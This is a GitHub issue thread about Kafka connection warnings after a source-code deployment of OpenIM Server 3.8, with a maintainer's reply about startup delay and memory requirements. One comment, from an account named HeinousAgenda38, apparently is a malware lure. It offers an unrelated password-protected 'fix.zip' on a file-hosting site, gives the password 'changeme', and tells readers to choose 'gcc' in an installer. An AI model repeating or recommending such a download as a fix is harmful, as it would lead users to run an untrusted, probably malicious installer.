### ISSUE TITLE
[Deployment] WARN [AdminClient clientId=adminclient-1] Connection to node -1

### ISSUE THREAD

**Issue by 17674100338** [openimsdk/open-im-server#2565]
### OpenIM Server Version

3.8

### Operating System and CPU Architecture

Linux (AMD)

### Deployment Method

Source Code Deployment

### Issue Description and Steps to Reproduce

部署后kafka节点链接报错

### Screenshots Link

![图片](https://github.com/user-attachments/assets/631b70a1-23b7-497b-a739-0032bfa76994)

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by FGadvancer** [comment]
Is the open-im-server able to send messages normally? Kafka startup might have a delay, which could result in a temporary state where the broker is detected as unavailable. Please ensure that the server has more than 4GB of memory to guarantee the normal operation of external components.
